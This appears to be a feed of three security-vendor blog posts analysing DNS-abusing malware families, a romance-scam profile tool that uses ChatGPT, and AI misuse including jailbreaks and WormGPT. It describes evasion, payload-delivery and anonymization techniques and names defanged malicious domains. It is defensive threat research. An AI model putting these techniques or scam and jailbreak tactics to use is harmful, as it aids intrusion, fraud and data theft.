Normal view

There are new articles available, click to refresh the page.
Before yesterdayAvast Threat Labs

Opening a new front against DNS-based threats

14 December 2023 at 17:25

Domain Name System (DNS) is a hierarchical decentralized naming system for numerous network devices connected to the internet or a private network. Its primary function is to translate user-friendly domain names, such as www.avast.com, into numerical IP addresses that devices use to identify each other on a network.

When a domain name is entered into a web browser, the computer first checks its local cache to see if it already knows the corresponding IP address. If the IP address is not found locally, the computer queries a DNS resolver. This resolver could be an Internet Service Provider (ISP) or a third-party service like Google’s 8.8.8.8. The resolver then checks its cache. If the IP address is not found, it acts as a client and queries the root DNS servers (in case of recursive resolvers).

As with basically any other technology, however, this system can also become a target of malicious actors. Let’s look at how Avast can protect users against various DNS threats, showcasing a few notorious malware families.

How DNS threats work

There are multiple ways in which threat actors can leverage DNS to carry out attacks. It is also out of the scope of this text to describe all the existing techniques in detail. However, we will provide a brief introduction to DNS threat landscape so that the reader can imagine how attacks like these work and why the threat actors are interested in such vectors.

Rogue/malicious DNS servers are specifically set up by threat actors to intercept and manipulate DNS queries. When a device queries DNS, the rogue DNS server can then respond with incorrect or malicious IP addresses, redirecting legitimate traffic to malicious destinations.

DNS tunneling is a technique where attackers use DNS protocols to encapsulate non-DNS traffic. This communication can be two-way directional, meaning both requests as well as responses can be encapsulated. This communication is usually used (but is not limited) for exchanging malware commands with a Command & Control (C2) server, and/or exfiltrating data from the victims.

DNS cache poisoning, also known as DNS spoofing, is a technique where attackers manipulate the DNS cache of a resolver, introducing false mappings between domain names and IP addresses. By injecting false DNS records into the cache, attackers usually redirect users to malicious sites where they are then able to intercept sensitive information. With this ability, they can perform man-in-the-middle (MitM) attacks. This technique can be also particularly dangerous, since with a successful spoofing taking place, the domains look legitimate to the user – the domain names are the same as the user is used to – though they lead to a different server, using the different IP address.

DNS fast fluxing is based on rapidly and regularly changing the IP addresses for a domain in the DNS records, making it more difficult to track and block the attackers’ infrastructure. Usually, the attackers either have a set of compromised servers/botnet that they can use, or they use a specific approach for changing the IP addresses, behaving similarly to a more traditional domain generation algorithm (DGA).

Why do attackers do it?

The reasons why attackers do this type of attack vary based on their techniques, as well as their intents. However, we can sum up the malicious purposes into these short points:

  • The malware can receive commands and instructions, enabling two-way communication 
  • The threat actor can deploy an additional payload onto the infected device 
  • Information stealers can exfiltrate sensitive data from the infected device 
  • The communication is more obfuscated, rendering it more difficult to track properly 
  • The communication is usually enabled by default, since the traffic operates on a common port 53 
  • The traffic may bypass traditional AVs and gateways due to the possible lack of monitoring and scanning

Threats in the wild

The number of malware families leveraging DNS to carry out malicious activity is increasing. At Avast, we keep up with the current trends and, with our DNS scanning feature, we provide robust protection even against these kinds of attacks.

Let’s peek under the hood of a couple of advanced malware families that leverage DNS for distributing additional payloads and obfuscating the communication with Command & Control (C2) servers.

ViperSoftX

ViperSoftX is a long-standing information stealer. Reaching back at least to 2020, it is mostly bundled with software from unofficial sources and cracks, commonly distributed over torrents. Its wide capabilities, which are to this day intensively developed and improved, go from stealing cryptocurrencies, clipboard swapping, fingerprinting the infected device, downloading and executing additional payloads, to further deploying a malicious browser extension called VenomSoftX

One of the features the malware authors also implemented is querying the DNS database to retrieve a TXT response from a registered C2 domain. This TXT record contains an execution command to download further malware stages. We can demonstrate this behavior ourselves by using nslookup on the malicious domain. 

DNS TXT record containing a PowerShell command

This command, returned in the form of a DNS TXT response, downloads an additional payload from microsoft-analyse[.]com. The file last.txt contains an obfuscated PowerShell script, carrying further malware stage when executed.

Payload script downloaded from the DNS TXT response script

DarkGate

Also known as MehCrypter and Meh, DarkGate is another advanced information stealer. This stealer, these days weaponized as malware-as-a-service (MaaS), continues to add new features to its operations. 

Alongside features like keylogging, stealing clipboard contents as well as cryptocurrency wallets, and RAT capabilities, DarkGate can also make DNS requests to query DNS TXT responses. 

Currently, one of the distribution methods starts as phishing (e.g., in a form of a PDF), with the document stating it cannot be loaded properly and the user needs to click on an “Open this document” button. This action downloads a ZIP archive, containing a LNK file with an icon of a PDF (Adobe Reader). However, after opening this LNK file, the malware will instead execute a command making a DNS request, reading the TXT field from the response.

Command executed from a LNK file, performing a DNS query

After the Taste.cmd script is downloaded and executed, a further series of commands is executed, deploying the DarkGate information stealer on the infected machine.

Taste.cmd script (beautified), an intermediary that ensures the execution of DarkGate

DirtyMoe

Since 2016, the notorious DirtyMoe malware has been infecting victims all over the world, focusing the most on Asia and Africa. This multi-modular backdoor is equipped with a variety of functionalities, ranging from exploiting network protocols, cryptojacking, performing DDoS attack, leveraging rootkit capabilities, and much more. 

This is further underlined by DirtyMoe’s sophisticated network communication. The malware makes DNS queries using a predefined list of DNS servers and retrieves a list of IP addresses for a single domain in the A records fields. However, these IP addresses, even though semantically correct, are artificial and they either do not exist or they are not pointing to the actual addresses desired by the malware. The real IP addresses are instead derived from these A records by an additional algorithm. Each of these derived IP addresses is then tried, one of them being the real C2 server. 

Finally, the list of the A records also changes rapidly and regularly. This DNS fast fluxing technique further obfuscates the real C2 servers from the fake addresses, making the whole malware communication even more opaque for the defenders. 

In the example below, the malicious server rpc[.]1qw[.]us provides a list of IP addresses (A records). However, these IP addresses are artificial, and they are used for further derivation of the real IP addresses.

DNS records are changed rapidly and regularly

Crackonosh

Similar to ViperSoftX, Crackonosh is distributed along with illegal, cracked copies of popular software. If the unsuspecting victim installs such cracked software, they inadvertently deploy an XMRig coinminer onto their system, leveraging its resources to profit the attackers. 

Crackonosh contains a lot of advanced techniques, such as disabling antivirus software and Windows Update, as well as performing other anti-detection and anti-forensic actions. 

Additionally, Crackonosh also queries the DNS database as part of its update mechanism. To do so, Crackonosh reads a TXT record from the registered server’s response which contains a string like ajdbficadbbfC@@@FEpHw7Hn33. This string is then parsed and both an IP address as well as a port are derived from it. With this information, Crackonosh downloads a file wksprtcli.dll, containing the malware’s update routine.

Crackonosh decrypting the IP address from a string received in the TXT record

DNS protection in Avast

At Avast, both our free and paid versions protect users against DNS-based threat. This protection, available since version 23.8, includes:

  • Support for detecting C2 callbacks, data exfiltration, and payload delivery through the TXT records 
  • Support for detecting DNS C2 tunneling through the malicious NS servers 
  • Scanner supports scanning of A, AAAA, PTR, NX, TXT DNS records, in both directions

Our paid plan also contains an additional feature, called Real Site, which provides an encrypted connection between your web browser and Avast’s own DNS server to prevent hijacking. In other words, Real Site ensures that the displayed website is the authentic one.

Conclusion

Understanding DNS threats is crucial for defenders. We described how threat actors can leverage DNS to carry out specific attacks. We also provided examples of advanced malware families that use such techniques, distributing additional malware payloads, obfuscating the communication, tunneling their C2 commands through the network, and more. With Avast’s DNS scanning capabilities, we protect our users against these types of threats. 

The post Opening a new front against DNS-based threats appeared first on Avast Threat Labs.

Love-GPT: How “single ladies” looking for your data upped their game with ChatGPT 

4 October 2023 at 13:15

Have you ever wondered, looking at a profile of a potential dream match on a dating platform, who is actually sitting on the opposite side of the screen? Will they look the same when you meet? Did they change something in their bio to make them sound more impressive? Do they like the things they say they do? Or… do they even exist? 

Well, sometimes the answer is: No.  

We have discovered a tool (which is still being developed and improved) that provides vast functionality over several different dating platforms, providing the capability to create fake accounts, interact with victims, bypass CAPTCHA, anonymize the access using proxies and browser anonymization tools, and more. The author is also experimenting with ChatGPT, the now-famous text-based generative AI, to provide them with more streamlined and believable texts. Because of that, we decided to name the tool Love-GPT

Overview

According to our data, the history of the tool goes back at least a decade. Its functionality was iteratively improved over time, adding newer dating platforms as they became more popular, as well as anonymization techniques, and interaction methods. The program contains several Vietnam-related strings, functions, and other references, and we attribute the author to be Vietnamese. 

In this blogpost, we will describe a version from 2023-06-06 (compilation date) with the main module version 347. Note that the tool contains different modules: for example, this main version contains a 544th version of Account Control Center module. 

ChatGPT functionality was likely added to Love-GPT around March 2023 (likely 2023-03-30, main module version 326). 

All versions we’ve seen are programmed explicitly in VB6, provided as a form application. Historically, these variants of module names existed at least at some point in time: 

  • account_control_center_alive_monitor_START_HERE.exe 
  • pof_reload_monitor.exe 
  • ringtones_runas_launch.exe 
  • ringtones_runas_login.exe 
  • scan_phone.exe 
  • virtualbox_pof_reg_CONTROLER_MONITOR.exe 

The tool further requires several additional apps for the whole toolset to function properly. As we will demonstrate, all of these are used to support anonymization of the access to the dating platforms, using proxies, creating a large number of fake accounts, getting and writing emails, and interacting with users. 

We can peek into the main module of Love-GPT below. The module contains several functionalities for interacting with users, including reading inboxes (getting answers and emails), browsing information about matches (the platforms’ way of indicating interest in the other user), sending likes, storing active cookies in a database, changing used proxy, and much more. There are also three different ChatGPT buttons providing a ChatGPT text generation functionality to the interactions.

The main module of Love-GPT

In total, the tool contains 58 different application forms, and it is out of the scope of this blogpost to list and describe all of them. However, we would like to show an additional one below, since it is essential for the whole toolset: the Account Control Center module. 

This module serves as a main hub for creation of fake accounts for all the supported dating platforms. It also supports scraping photos from the platforms, downloading HTML content about any visited page, using PowerTCP to extract cookies, using Multilogin, ProxyRental, Luminati, MountProxy tools for anonymization, and more. The tool also has a (weak) random generator for the new fake accounts’ passwords, and a random selector from a list of 1000 common US names. The built-in browser allows the operator to visually check the tool’s behavior, as well as manually interact on the visited page, when necessary, in case the automation is not enough.

Account Control Center with a build-in browser

Note that the tool we are describing here is huge and we might have missed some important aspects in its functionality or omitted them since they are out of scope for a single blogpost. We are still investigating parts of the program and they might be the subject of a follow-up blogpost(s) in the future.

Fake profiles and data harvesting

Database

As we already mentioned, the main goal of the tool is to create fake profiles on several dating platforms and to store/scrape data from the interactions with the platforms’ users, including their profile pictures, profile body texts, dates of communication, etc. 

In order to be successful in this goal, the tool uses three large databases, called CL Harvest (CL_db_harvest_db), pof_db (as of Plenty of Fish database), and gmail_db, to store a huge variety of information. Since all the databases are intertwined, likely because of historical reasons, we will from now on refer to them as a single database to simplify the analysis. 

The tool uses a Microsoft SQL Server as a database, orchestrating the communication using SQL Server Native Client (provider SQLNCLI10) from inside the program.

Login screen to access the local database with author’s default credentials

Stored information

Currently, the database structure contains approximately 180 different database tables in total (note that the number differs depending on the versions of the tool). We would like to mention at least a few of them, providing interesting insights into what data is being collected or created. We believe none of them need further description.

Table name Note 
a_02_Okcupid_photo_db_scanned_from_okcupid  
a_02_Okcupid_photo_db_scanned_from_okcupid_age_group_1 Age groups are described later 
a_02_okcupid_about_text_db_age_group_3 Profile “about” description texts 
a_03_zoosk_replied_users  
a_07_ashley_accounts  
duyenso_create_fake_profile_current_setting DuyenSo is a Vietnamese dating platform 
email_addresses  
openai_chat_log  
openai_prompt_1st_contact_msg  
openai_prompt_ask_for_number  
openai_prompt_ask_for_number_for_OKCUPID  
openai_prompt_ask_for_number_INDIRECT_WAY  
openai_prompt_chat_template  
openai_prompt_profile_body_text  
pof_accounts_for_scan_new_users  
twilio_for_PVA_direct PVA states for “phone verified account” 
twilio_phone_for_dating_2018  
twilio_uk_mobile_number_database  
US_female_firstname_len_5 len” states for “length” 
US_male_firstname_len_5 len” states for “length” 
Table listing just a few table names from the database

Furthermore, the tool saves images from the dating platforms into several directories: 

  • C:\fb_dating_all_avartar_temp\ (mind the typo) 
  • C:\fb_photo_set_temp\ 
  • C:\PIC for POF\BIG STORE\
  • C:\twoo_scanned_photo\ 
  • E:\FB dating girls photo by city\ 
  • F:\5K Female photos by hair color\ 
  • E:\temp_okcupid_downloaded_photo\ 
  • G:\duyenso_pics_from_pof
  • G:\duyenso_pics_from_pof_girls\ 
  • G:\duyen so acc photo - ready to up - girls\ 
  • G:\duyen so acc photo - ready to up - man\

Age groups

The tool categorizes the users into four different age groups: 

Age group Age range 
30-37 years 
37-49 years 
49-60 years 
No group None of the above 

This serves as a filtering option, and it also shows what ages are interesting for the author/operator. We suppose this is due to the fact that the author is most likely using the stolen information to create further fake accounts. The age group might be an important aspect for setting up the fake age properly, especially with photos. 

Targeted dating platforms

We have identified 13 different dating and social discovery platforms that the tool interacts with, as of the 2023-06-06 analyzed version. The list of the dating platforms can be found below:

Dating platform Note 
Ashley Madison  
Badoo  
Bumble  
Craigslist Interested in “Personal” / “cas” section – “casual encounters” 
DuyenSo Vietnamese dating app 
Facebook Dating  
likeyou.vn Vietnamese social network and dating platform 
MeetMe  
OkCupid  
Plenty of Fish  
Tagged  
Tinder  
Zoosk  

The tool has several steps it takes in order to create the fake accounts, following the process of registering on the platforms. This often involves getting through CAPTCHA, verifying phone numbers (PVA), and creation of fake email addresses, usernames, and passwords. All these steps are performed by the tool, seeking the most automatic process possible. If any of the automations fail, the tool also contains a built-in browser that allows the operator to perform the steps manually. 

Note that Craigslist discontinued the “Personal” section during the FOSTA-SESTA acts in 2018 and we consider this functionality obsolete and not used in the program anymore. 

Historically, Love-GPT was interested in other dating sites/social platforms, too. For example, we could find traces of Twoo, Oodle, and Fetlife. These platforms, however, don’t have proper functionality incorporated in the tool anymore.

Using ChatGPT

During 2023, the author started to use ChatGPT to generate new profile descriptions as well as other prompts to interact with the dating platforms’ users. The author uses a ChatGPT API token which is hardcoded in the binary. 

We estimate that the ChatGPT functionality started to occur around March 2023 (likely 2023-03-30, main module version 326) and it is still under development. Some parts of the functionality seem still like proof-of-concept, and we suppose they are not fully functional yet, with some of them proving more potent already. 

The functionality provides an interesting insight into the upcoming trend of using highly believable texts leveraging generative AI and large language models (LLMs). We can already see that tools misusing the generative AI platforms are emerging and this is likely one of the first in-the-wild examples how it can be misused by the bad actors. 

Overall, the tool contains these functionalities leveraging ChatGPT (both finished and under development): 

  • Create a fake profile description to be used on the dating platforms
  • Read the inbox on the dating platform and reply to messages 
  • Ask for a phone number 
  • Write a first contact message 
  • Chat from a template

In the current implementation, the tool uses these two ChatGPT models: 

  • text-davinci-003 
  • gpt-3.5-turbo

Request parameters

The tool uses different set of parameters for the performed tasks, influencing ChatGPT via its API to perform as needed. For example, parameters for creating a profile body, ensuring diverse and short texts, are as follows: 

  • "temperature": "1"
  • "max_tokens": "60"
  • "top_p": "1"
  • "frequency_penalty": "0.5"
  • "presence_penalty": "0"

Note that for other prompts, temperature = 0.5 is usually used as well, scaling down the randomness. 

The tool uses “prompt” values in the API requests’ body to generate the output. In some of the cases, the whole context is provided to guide ChatGPT for the more precise results:

Just for the sake of demonstration, this is what ChatGPT usually returns for similar prompts:

The detailed description of the parameters available in the ChatGPT API can be found in the official documentation

They tool to win

Love-GPT uses a large set of additional tools and components to stay hidden/anonymize its interaction with the dating sites and their users. It also contains additional components for it to operate, using communication tools and protocols, Android emulator, and OCR for CAPTCHA bypass.

Staying anonymous

The tool needs to use real-looking, fake request fingerprints to reliably access the dating platforms. Otherwise, the platforms could detect such activity and suspend/ban the accounts or bombard the access with CAPTCHAs and other anti-crawler safeguards. 

Below, you can find a list of the anonymization tools being used, with a short description. 

Tool Short description 
AdsPower Anti-fingerprinting tool using virtual browser profiles 
FraudFox Virtual machine and a tool for user-agent and device spoofing 
Identory Anti-fingerprinting browser platform, creating unique identities for any site 
Kameleo Anti-fingerprinting browser platform using virtual browser profiles 
Luminati Proxy network, allowing anonymity for data collection and web scraping 
MountProxy Residential proxy provider 
Multilogin Anti-fingerprinting tool using virtual browser profiles 
ProxyRental Residential proxy and dynamic IP provider 

To summarize, with this artillery, Love-GPT stays under the radar because no one can effectively distinguish connections coming from this specific tool and other regular users accessing the platforms. 

Communication components

Love-GPT can communicate with the users directly on the dating platforms. Because the platforms usually need to verify its users using unique email addresses or even require a PVA accounts (phone verified accounts), the tool has a complete email and phone number management. To achieve this goal, it uses these services and tools: 

  • Email services – Gmail, Yahoo 
  • PowerTCP
  • Pinger 
  • SMSpva (smspva.com
  • TextFree 
  • TextNow 
  • Tropo
  • Twilio

SMSpva is a service for obtaining temporary phone numbers. Along with TextFree, TextNow, Twilio, and others, the toolset provides a convenient way how to enable receiving the SMS verification codes for PVA registration. 

The tool is also able to analyze and send emails from the created Gmail or Yahoo accounts’ inboxes, as well as forwarding emails to different addresses. 

Finally, Love-GPT also uses PowerTCP, or more specifically DartWeb.dll, to support network and communication-related traffic with the web.

Buying new domains

Love-GPT also has a system for buying new domains and making renewals of the already registered domains, including performing payments for the domains. Historically, this was being performed using Entropay. However, since Entropay’s consumer product was discontinued in 2019, we suppose the Love-GPT’s operator switched to some other similar consumer-based service, but that is not reflected in the code – virtual credit card information is stored on the author’s local database, not in the binary. 

The main purpose for this functionality is to set a domain forwarding through the registered domains. To achieve this, the tool uses an API to check the required domains availability, checking the auto-renewal options, as well as setting up the forwarding: 
https://api.name.com/v4/domains/ 

Android emulation

Since some of the platforms are mobile based, for example DuyenSo or the Facebook dating app, the tool uses LDPlayer to emulate a proper behavior on the supported dating platforms. 

The tool also uses a shared folder for exchanging files between the emulator and the local filesystem, mostly for transferring photos: 

  • E:\LDplayer_shared_folder_for_fbdating\

OCR and CAPTCHA

Quite an effort was made in Love-GPT to bypass CAPTCHAs. It uses two different Optic Character Recognition (OCR) tools for capturing texts: 

  • OmniPage 
  • DeCaptcher 

Love-GPT has a dedicated panel, a control center, to orchestrate the CAPTCHA bypassing functionality. 

CAPTCHA Control Center

Future work

During our research, we have discovered multiple additional tools with similar purposes, some of them even likely from the same author who is behind Love-GPT. These vary from more broad scrapers to highly specialized, for example just focusing on Tinder. This clearly shows the trend of automation in this field and ChatGPT can be useful in streamlining the interactions to harvest further data from the victims than they would share otherwise. 

Hashes

Hash Compilation date 
8071dc3dc1e7814f644f2745bbebab8c159763a3605b3615847772851b3960ce 2023-06-06 
cf809afcad7a2054a8c39a84443579d0c9d81ddf0233164bf2a4214a39b6206c 2023-03-30 

The post Love-GPT: How “single ladies” looking for your data upped their game with ChatGPT  appeared first on Avast Threat Labs.

Insights into the AI-based cyber threat landscape

5 September 2023 at 13:38

Executive summary

Both large language models (LLMs) and generative AI are undergoing a significant increase in their abilities and global utilization. While these tools offer undeniable utility to the general public, they also present potential risks of misuse. Furthermore, bad actors are also actively investigating tools like OpenAI’s ChatGPT. 

This document describes following aspects of an AI-based cyber threat landscape: 

  • How ChatGPT brand is misused for lures, scams, or other social engineering related threats 
  • How generative AI can be used to generate malware 
  • The potential pitfalls and changes it brings for security researchers and attackers 
  • How ChatGPT and generative AI can help security researchers in their daily struggles, providing insights, and bringing AI-based assistants to their toolset 

Generative AI and other forms of AI are going to play a key role in the cyber threat landscape. We expect that highly believable and multilingual texts misused for phishing and scams will be leveraged at scale, providing better opportunities for more advanced social engineering. 

On the other hand, we believe that generative AI as it stands now is unlikely to drastically alter the landscape of malware generation. Although many proofs of concept exist—mainly from security firms and nefarious actors testing the technology—it’s still a complex approach, especially when compared to existing, simpler methods. 

Despite the risks, it is important to recognize the value that generative AI brings to the table when used for legitimate purposes. We already see security and AI-based assistant tools with various levels of maturity and specialization emerging on the market.  

Given the rapid development of these tools and the widespread availability of open-source versions, we can reasonably anticipate a substantial improvement in their capabilities in the near future. 

This post can be also downloaded as a PDF here.

AI-generated lures and scams  

AI-generated lures and scams are having a moment. In the world of cybercriminals, AI now serves as the perfect use case for creating lures and carrying out phishing attempts and scams on victims. This is due to the fact that AI serves as a helping hand in writing various forms of texts–emails, social media content, e-shop reviews, SMS scams, and more. In general, AI also improves the credibility of social scams by providing trustworthy, authentic texts that eliminate the traditional phishing red flags, such as broken language and weird addressing. To our surprise, when we asked ChatGPT to make a lottery scam email more believable, it reduced the amount won, which can make the email slightly more believable.  

These threats, increasingly sophisticated and persistent, have begun to exploit advanced technologies, creating a new battlefield in the world of AI systems. In recent years, we’ve witnessed a number of societal issues and initiatives abused in a similar fashion—including (but not limited to) cryptocurrencies, Covid-19, and the war in Ukraine

In the case of ChatGPT, its popularity with hackers has less to do with their interest in AI than it does with the fact that ChatGPT has now become a household name. With the amount of attention ChatGPT receives these days, it would be surprising if attackers didn’t investigate how it can be used for their purposes. 

How is generative AI supporting the creation of lures and scams?

When examining the ChatGPT scams created by cybercriminals, it’s important to observe the language used in scams and how AI can support malware authors in creating more advanced texts than they’d otherwise be capable of writing. AI can easily improve grammatical mistakes, provide content in multiple languages, and create multiple variations of texts to improve their believability. 

ChatGPT can currently provide robust, well-written texts, but if an attacker wants to perform a sophisticated phishing attack, they’d need to insert the text into proper templates. This is because phishing attempts must appear to be credible and consist of more than just text. The attackers can choose from a plethora of existing phishing kits for sale where they obtain already functional and well-designed phishing webpages or emails. They can also use web archiving tools to create a copy of the web and change the appropriate URLs to phish the victims.  

For now, it’s necessary for attackers to build some aspects of their attempts manually and ChatGPT is not currently the ultimate “out of the box” solution for creating advanced malware. Users simply can’t ask for a copy of a website along with a code and styles to run it. That being said, we expect that multi-type models, allowing the combination of multiple LLM outputs, including images, audio, and video, will emerge in the near future. Furthermore, we can already see projects like LlamaIndex incorporating multiple sources of data, enhancing the capabilities even further. With that, we expect that multi-type LLMs will be able to create highly believable custom phishing and scam campaigns targeting a specific audience, including special offers, package deliveries, investment opportunities, scams during big events, and more. 

Malvertising

Malvertising—a portmanteau of “malicious advertising”—is a cybercrime tactic where malware is disseminated through online advertising. This technique cleverly exploits the extensive reach and interactive nature of digital ads to distribute harmful content. 

Unfortunately, attackers leverage ChatGPT’s name for these malicious vectors, with instances observed involving ads on popular platforms such as Facebook. For example, we have observed ads leading to articles and claiming massive income opportunities where all embedded links redirect to a fraudulent investment portal. 

People typically have to register or provide some kind of personal information. This serves as a first filter to lower the number of people who are not easily fooled by easy wins, get rich quick schemes, and so on. 

Once users provide their information, they become susceptible to a variety of malicious actions, such as identity theft, financial fraud, account takeovers, or being lured into further scams. The personal data collected can be misused or sold on the dark web, contributing to a broader ecosystem of cybercrime. Consequently, users who fall victim to malvertising may experience significant financial losses, compromised privacy, and emotional distress. 

The malvertising tactic is a good example of the ever-evolving strategies that cybercriminals employ to exploit trust and credibility. Recognizing such deceptive tactics is the first step towards mitigating the risks posed by these online threats. 

YouTube scams

YouTube, one of the world’s most popular online platforms, has not been spared from cybercrime. We have seen a significant increase in fake videos using prominent figures to trick users into harmful actions. What makes these scams especially insidious is their exploitation of trust, credibility, and human curiosity. 

The strategy often employed here is known as the “Appeal to authority” or “Argument from authority,” where cybercriminals use influential figures to supposedly validate the credibility of their message or investment opportunity. This manipulation can lead to the phishing of personal details, such as banking information, or directly coerce the victim into sending money to the attacker. 

In one particular instance, videos were created featuring Elon Musk to lure unsuspecting users. These videos often capitalize on Musk’s authority and influence in the tech and business world to legitimize the content. As we can see below, the motives of ChatGPT are often misused to lure users. 

The bad actors behind this case used a recording from an official stream discussing aspects of OpenAI and modified it to scam victims without the need of using voiceovers or deepfakes. At certain points in the video, a QR code is displayed that ostensibly offers access to exclusive content or rewards. In reality, this QR code redirects users to a scam page. These scam pages often take the form of cryptocurrency scams promising “easy” profits or elaborate phishing attempts that trick users into revealing sensitive information. 

The danger of these scams lies not only in the potential financial loss. Similarly to the malvertising, the theft of personal data can be used for further phishing attacks, account takeover, impersonation, or sold on the dark web

Although the use of AI was not necessary in this particular case, with increasing maturity of AI models like Midjourney, DALL-E or other purpose-built models we can only expect the use of artificially created fake images, videos, and audio, to increase over time both in quantity and quality. Tools like this can truly achieve remarkable results, even though they never actually happened. We are already seeing tools that allow users to quickly generate videos from a text script. It is still quite noticeable that the videos are not real, but that will become less visible in the future.

Typosquatting

Typosquatting usually involves minor changes in URLs to redirect users to a different website, potentially leading to phishing attacks. Furthermore, typosquatting is also used to encourage users to install applications that seem legitimate but aren’t. An Android app named “Open Chat GBT : AI Chat Bot”, which is shown in the screenshot below, is a prime example of this tactic. This subtle alteration can go unnoticed by users who aren’t paying close attention. 

Browser extensions

Following the introduction and surge in popularity of ChatGPT, we witnessed the emergence of myriad browser extensions. While there are a number of legitimate extensions that have gained popularity, other malicious versions have used that popularity to lure in victims. 

To trick unsuspecting users, attackers create an extension with an enticing title that contains or closely resembles ChatGPT. The attackers leverage this confusion to convince users that the browser extension is genuine when, in reality, it’s a malicious piece of software. These apps often disseminate adware or stealers/spyware, with some even tricking users into subscribing to services that periodically drain fees from the victim’s credit card (this is also known as fleeceware). 

One such case was documented by Guardio, where threat actors copied the design of a legitimate extension called “ChatGPT for Google”. The malicious version of the extension spread by these bad actors steals the Facebook sessions and cookies of its victims.

Image credit: Guardio 

Fortunately, in the case of this malicious extension copycat, Google removed it from the Chrome Web Store shortly after it was reported by Guardio. 

Installers and cracks

When trying to download a popular tool or application that you want to use, it’s not uncommon to come across installers that contain malware. These installers are designed to trick users into installing harmful software on their devices without even realizing it. They often appear to be legitimate installers, using the name and appearance of the real tool or application that you’re interested in. 

We can observe malicious installers like this misusing the name of ChatGPT that give users the promise to install and use ChatGPT on their device. One such example discovered by Meta’s engineering team is NodeStealer, malware that steals passwords and cookies from browsers. 

Cracks or unofficial versions of software can be risky, as it’s possible to hide malware inside them. Once installed, the malware may allow hackers to access your personal information, steal your passwords, or even take control of your computer. 

Fake updates

While browsing the web, users might come across an article that appears to be essential to read. But upon clicking the link, a page is displayed claiming that the browser is out of date and needs an update to show the content. One example is a SocGholish campaign where ChatGPT related articles are, among other topics, misused by attackers to lure people into downloading a browser update which is in fact typically a remote access trojan (RAT) giving the attacker complete control of the infected device. We see these pages often hosted on WordPress sites with vulnerable plugins or sites with weak admin credentials. 

AI as a tool for malicious purposes 

Recognizing AI-generated content is harder than you might think

Large language models (LLMs)—the AI tools that power tools like ChatGPT—have been creating a lot of buzz from their beginning. People have been amazed by their capabilities, and they’ve undeniably opened up a wide range of new possibilities. At the same time, LLMs have also brought some troubles. For example, schools have quickly needed to figure out how to approach these newly available tools while effectively communicating their pros and cons to students.  

As a result, the need for a tool able to recognize AI-generated content emerged. We have analyzed a couple of projects that claim to be able to identify such content. Some of them have good results on basic prompts, but each one of them fails once any type of change is introduced. More specifically, generated text that was properly detected as 100% AI-generated was suddenly 100% human once ChatGPT was asked to introduce a couple of mistakes.  

When it comes to detecting AI-generated code or even binaries compiled from AI-generated sources, the problem becomes even trickier. Similar to detecting more traditional malware, this is yet another never-ending cat and mouse game between AI generators and detectors: Once the first detectors started popping up, new generators were created to avoid them. 

LLMs and malware 

Time and time again, it has been proven that LLMs can be used to generate malicious code. However, it should be noted that while LLMs can significantly simplify the process, some degree of understanding of the malware development process is required to get the desired output. There are also many available malware builders, obfuscators, and packers that make the LLM approach more cumbersome as they provide a tailored solution designed to create malware in such a way there is no active protection from malicious inputs. 

Our team tested LLMs to generate simple malicious portions of code for testing our products, and in doing so, we’ve put together some key takeaways:

1. Proof of recognizing AI-generated content is hard, and protection techniques (such as packing and obfuscation) makes it even harder

As mentioned above, the cat and mouse game between AI generators and detectors continues to play out. Since AI vendors continuously improve their models, detection models can become obsolete quite quickly.  

It is important to mention that LLMs don’t change the behavior of code, just how the code was created. So far, we haven’t seen LLMs come up with a novel, previously unseen technique to infect machines. It can only use an arsenal of already known techniques.

2. Malware authors need to figure out much more than just source code

They need to verify the proper functionality of the code, testing environments, obfuscation, distribution methods, and the infrastructure of the vector. What’s more, they’re responsible for preventing takedowns–at the end of the day, it’s cybercriminals’ intent to have the threat working for the longest possible period of time.  

Testing of the generated code is important as our attempts showed a rather high amount of cases where the code didn’t work as intended on the first go and these errors can be hard to notice at first glance. 

The task of covering their tracks must also be included in a hackers’ scope of responsibility. This often amounts to money laundering, anonymization, and generally operational security.

3. Creating malware still requires a fair amount of technical knowledge

When it comes to creating prompts for LLM malware, the prompts themselves need to be quite precise–technical knowledge of how to write the code is still needed, although non-sophisticated components can be more straightforward to write. Many real-world examples only showcase short snippets of the malware creation process due to restrictions in both the prompt length as well as the security filters implemented in the LLM systems to avoid misuse for malicious purposes. Because of this, it can still be difficult to make a functional, more complex codebase. As an interesting consequence a whole new type of job has emerged where creating prompts for the model is the primary activity. 

It’s necessary for the attacker to test the results, tweak the queries, and know what the ideal (malicious) solution should look like. It is important to recognize that the attacker must possess knowledge of AV protections, anti-sandbox and anti-debugging tricks, as well as obfuscation techniques to overcome security measures. For these reasons, LLM malware isn’t the top choice for exercising the creativity required to write these kinds of malicious code. 

Spambots, social media, and fake reviews 

The rise of AI technology has inadvertently led to an evolution in spam tactics. Spambots have been observed exploiting OpenAI’s ChatGPT system, which has a filtering mechanism designed to avoid generating offensive or inappropriate responses. 

Instead of generating a substantive response, ChatGPT returns an error message when asked to generate inappropriate content, such as: “As an AI language model, I cannot generate inappropriate or offensive content,” or “I’m sorry, I cannot generate inappropriate or offensive content.” 

In many cases, spambots and fake social media bot accounts inadvertently publish these error messages. This is because spambots (both their algorithms and the people behind them) don’t validate output from ChatGPT—instead, they use the response from ChatGPT directly, resulting in self-incrimination of the bot as these messages can be used as a telltale sign of spambot activity.

Image credit: Twitter 

Interestingly, we have also noticed spambots manipulating user reviews. Some entities copy a response directly from ChatGPT in an attempt to gain positive feedback or inflate product ratings. This highlights the evolving sophistication of spam strategies and the importance of maintaining vigilance in digital interactions.

Image credit: VICE 

Spambots try to systematically flood product listings with deceptive reviews that exaggerate positive aspects, artificially inflate ratings, and create a false perception of popularity and quality. Users rely heavily on reviews to make informed buying choices, and when manipulated by spambots, they may unknowingly purchase subpar products based on misleading information. 

Each of these examples goes to show that ChatGPT is consistently being used for malicious purposes. The quality of the ChatGPT textual outputs as well as its capability to generate many different wordings will make the detection of fake reviews harder for both the e-shops as well as humans. 

Generating other inappropriate results 

ChatGPT has a filtering system in place, but bad actors are still able to find ways around this in order to generate content for malicious purposes. Although it’s possible to get around the tool’s safeguards, this proves to be a timely task for hackers, who can save time simply by searching for queries using a traditional search engine. After all, there is a lot of “educational-use-only” malware on GitHub anyways.

It is possible that tools able to bypass the security filters, which is also called “jailbreaking”, will make the use of ChatGPT for malicious purposes more convenient. We can already see efforts like WormGPT, which is based on open-source LLM models and trained with malware in mind. Unlike other AI models that have implemented restrictions to combat abuse, WormGPT operates without ethical boundaries, making it more accessible even to novice cybercriminals.

Deepfake

